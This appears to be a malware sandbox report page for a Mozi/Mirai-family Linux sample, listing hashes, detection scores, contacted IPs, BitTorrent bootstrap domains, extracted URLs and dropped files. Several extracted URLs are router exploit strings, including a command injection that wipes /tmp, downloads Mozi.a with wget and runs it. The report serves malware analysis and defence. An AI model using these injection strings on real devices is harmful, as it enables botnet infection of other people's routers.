rIbyGX66Op

Status: finished

Submission Time: 2021-04-25 21:12:06 +02:00

Malicious

Spreader

Trojan

Evader

Mirai

Comments

Details

Analysis ID:
397469
API (Web) ID:
697096
Analysis Started:

2021-04-25 21:12:42 +02:00
Analysis Finished:

2021-04-25 21:23:27 +02:00
MD5:
eec5c6c219535fba3a0492ea8118b397
SHA1:
292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:
12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)

Third Party Analysis Engines

Open Full Report

malicious

Score: 41/60

Open Full Report

malicious

Score: 20/37

malicious

Score: 20/29

malicious

IPs

IP	Country	Detection
138.94.203.237	Brazil
84.234.82.133	Denmark
120.72.175.96	China
Click to see the 97 hidden entries
199.247.32.171	United States
17.103.205.243	United States
175.12.222.235	China
91.244.32.53	Ukraine
68.87.138.12	United States
161.141.143.253	Canada
32.69.172.174	United States
200.161.213.126	Brazil
163.112.176.81	France
86.18.93.173	United Kingdom
64.48.220.97	United States
19.21.98.61	United States
32.26.172.252	United States
18.198.126.226	United States
113.81.33.205	China
166.231.171.29	United States
87.178.42.105	Germany
120.123.201.216	Taiwan; Republic of China (ROC)
162.159.107.38	United States
208.150.231.33	United States
104.222.233.43	United States
194.207.227.221	United Kingdom
117.177.0.80	China
222.121.68.4	Korea Republic of
175.158.80.139	India
197.35.48.236	Egypt
159.196.101.170	Australia
180.77.237.198	China
145.152.174.114	Netherlands
60.234.236.97	New Zealand
128.188.21.157	United States
155.228.130.68	Switzerland
201.195.173.239	Costa Rica
121.192.9.176	China
35.224.66.235	United States
185.189.120.185	Iran (ISLAMIC Republic Of)
202.146.185.28	unknown
119.100.162.203	China
94.117.20.210	United Kingdom
35.121.101.202	United States
79.73.229.27	United Kingdom
115.24.120.43	China
53.181.254.20	Germany
4.214.87.116	United States
167.13.97.181	United States
107.112.161.192	United States
134.106.59.104	Germany
175.111.30.198	Korea Republic of
136.26.47.177	United States
166.201.228.49	United States
102.44.180.253	Egypt
35.37.134.166	United States
14.239.14.115	Viet Nam
46.14.87.211	Switzerland
196.164.176.188	South Africa
39.241.4.19	Indonesia
172.143.86.137	United States
86.170.164.103	United Kingdom
119.215.90.101	Korea Republic of
96.100.50.191	United States
178.82.160.65	Switzerland
39.187.20.227	China
72.163.148.240	United States
97.71.87.134	United States
13.162.43.135	United States
5.71.245.186	United Kingdom
64.134.176.11	United States
220.236.199.32	Australia
118.208.32.220	Australia
40.244.52.155	United States
27.197.73.200	China
96.85.17.58	United States
77.187.60.235	Germany
203.49.228.158	Australia
197.67.5.164	South Africa
221.97.226.130	Japan
118.191.184.146	China
185.149.161.32	Russian Federation
128.101.242.184	United States
95.82.71.140	Kazakhstan
108.204.197.113	United States
68.129.151.18	United States
2.164.195.43	Germany
53.117.221.59	Germany
221.68.20.5	Japan
195.157.0.194	United Kingdom
133.82.183.72	Japan
157.159.2.178	France
79.116.36.122	Romania
181.113.148.196	Ecuador
187.213.209.8	Mexico
182.9.38.118	Indonesia
217.131.3.242	Turkey
5.232.235.2	Iran (ISLAMIC Republic Of)
124.12.205.156	Taiwan; Republic of China (ROC)
11.89.47.10	United States
37.211.3.99	Qatar

Domains

Name	IP	Detection
dht.transmissionbt.com	212.129.33.59
bttracker.acc.umu.se	130.239.18.159
router.bittorrent.com	67.215.246.10
Click to see the 2 hidden entries
router.utorrent.com	82.221.103.244
bttracker.debian.org	0.0.0.0

URLs

Name	Detection
http://%s:%d/bin.sh;chmod
http://220.130.214.100:80/HNAP1/
http://%s:%d/bin.sh
Click to see the 35 hidden entries
http://121.5.104.125:80/HNAP1/
http://3.11.29.16:80/HNAP1/
http://69.195.90.130:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://104.72.178.146:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://95.217.3.9:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://127.0.0.1:80/GponForm/diag_Form?images/
http://%s:%d/Mozi.a;sh$
http://HTTP/1.1
http://www.alsa-project.org.
http://www.pastebin.ca.
http://%s:%d/Mozi.m;
http://www.alsa-project.org/alsa-info.sh
http://purenetworks.com/HNAP1/
http://34.90.159.216:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
http://www.pastebin.ca
http://pastebin.ca)
http://schemas.xmlsoap.org/soap/envelope//
http://%s:%d/Mozi.m;/tmp/Mozi.m
http://164.125.103.242:80/HNAP1/
http://ipinfo.io/ip
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
http://127.0.0.1sendcmd
http://www.alsa-project.org/cardinfo-db/
http://%s:%d/Mozi.m
http://www.pastebin.ca/upload.php
http://www.alsa-project.org
http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
http://127.0.0.1
http://schemas.xmlsoap.org/soap/envelope/
http://%s:%d/Mozi.m;$
http://127.0.0.1:8080/GponForm/diag_Form?images/
http://schemas.xmlsoap.org/soap/encoding/
http://%s:%d/Mozi.a;chmod

Dropped files

Name	File Type	Hashes
/etc/init.d/mountall.sh	ASCII text	#
/usr/bin/gettext.sh	ASCII text	#
/usr/networks	ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped	#
Click to see the 97 hidden entries
/usr/sbin/alsa-info.sh	ASCII text, with very long lines	#
/etc/rcS.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/etc/rc.local	ASCII text	#
/etc/profile.d/vte-2.91.sh	ASCII text	#
/etc/profile.d/cedilla-portuguese.sh	ASCII text	#
/etc/profile.d/bash_completion.sh	ASCII text	#
/etc/profile.d/apps-bin-path.sh	ASCII text	#
/etc/profile.d/Z97-byobu.sh	ASCII text	#
/etc/init.d/umountnfs.sh	ASCII text	#
/etc/init.d/mountnfs.sh	ASCII text	#
/etc/init.d/mountnfs-bootclean.sh	ASCII text	#
/etc/init.d/mountkernfs.sh	ASCII text	#
/etc/init.d/mountdevsubfs.sh	ASCII text	#
/etc/init.d/mountall-bootclean.sh	ASCII text	#
/etc/init.d/hwclock.sh	ASCII text	#
/etc/init.d/hostname.sh	ASCII text	#
/etc/init.d/checkroot.sh	ASCII text	#
/etc/init.d/checkroot-bootclean.sh	ASCII text	#
/etc/init.d/checkfs.sh	ASCII text	#
/etc/init.d/bootmisc.sh	ASCII text	#
/etc/init.d/S95baby.sh	POSIX shell script, ASCII text executable	#
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-whatchanged.sh	ASCII text	#
/usr/share/doc/git/contrib/fast-import/git-import.sh	ASCII text	#
/usr/share/doc/git/contrib/git-resurrect.sh	ASCII text	#
/usr/share/doc/git/contrib/remotes2config.sh	ASCII text	#
/usr/share/doc/git/contrib/rerere-train.sh	ASCII text	#
/usr/share/doc/git/contrib/subtree/git-subtree.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-verify-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-tag.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-revert.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-resolve.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-reset.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-repack.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-pull.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-notes.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-merge-ours.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-ls-remote.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh	ASCII text	#
/usr/share/doc/xdotool/examples/ffsp.sh	ASCII text	#
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh	ASCII text	#
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh	ASCII text	#
/usr/share/doc/tmux/examples/bash_completion_tmux.sh	ASCII text	#
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh	ASCII text	#
/usr/share/doc/netcat-openbsd/examples/dist.sh	ASCII text	#
/usr/share/doc/mdadm/examples/mdadd.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh	ASCII text	#
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh	ASCII text	#
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/ping-places.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/get-mac-address.sh	ASCII text	#
/usr/share/doc/ifupdown/examples/check-mac-address.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh	ASCII text	#
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh	ASCII text	#
/etc/wpa_supplicant/functions.sh	ASCII text	#
/usr/share/cups/braille/indexv4.sh	ASCII text	#
/usr/share/cups/braille/indexv3.sh	ASCII text	#
/usr/share/cups/braille/index.sh	ASCII text	#
/usr/share/cups/braille/cups-braille.sh	UTF-8 Unicode text	#
/usr/share/brltty/initramfs/brltty.sh	ASCII text	#
/usr/share/alsa/utils.sh	ASCII text	#
/usr/share/alsa-base/alsa-info.sh	ASCII text, with very long lines	#
/tmp/.config	ASCII text	#
/etc/wpa_supplicant/ifupdown.sh	ASCII text	#
/usr/share/debconf/confmodule.sh	ASCII text	#
/etc/wpa_supplicant/action_wpa.sh	ASCII text	#
/etc/bash_completion.d/libreoffice.sh	ASCII text	#
/etc/acpi/undock.sh	ASCII text	#
/etc/acpi/tosh-wireless.sh	ASCII text	#
/etc/acpi/powerbtn.sh	ASCII text	#
/etc/acpi/ibm-wireless.sh	ASCII text	#
/etc/acpi/asus-wireless.sh	ASCII text	#
/etc/acpi/asus-keyboard-backlight.sh	ASCII text	#
/usr/share/doc/gdb/contrib/expect-read1.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-gc.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-fetch.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-commit.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clone.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-clean.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-checkout.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-am.sh	OS/2 REXX batch file, ASCII text	#
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh	ASCII text	#
/usr/share/doc/gdb/contrib/gdb-add-index.sh	ASCII text	#
/usr/share/doc/git/contrib/examples/git-log.sh	ASCII text	#
/usr/share/doc/gdb/contrib/ari/gdb_find.sh	ASCII text	#
/boot/grub/i386-pc/modinfo.sh	ASCII text	#
/usr/share/doc/gawk/examples/prog/igawk.sh	awk or perl script, ASCII text	#
/usr/share/doc/gawk/examples/network/PostAgent.sh	ASCII text	#
/usr/share/doc/cron/examples/cron-tasks-review.sh	ASCII text	#
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh	ASCII text	#
/usr/share/doc/acpid/examples/default.sh	ASCII text	#
/usr/share/doc/acpid/examples/ac.sh	ASCII text	#

rIbyGX66Op

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

rIbyGX66Op Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

Domains

URLs

Dropped files

Search started

rIbyGX66Op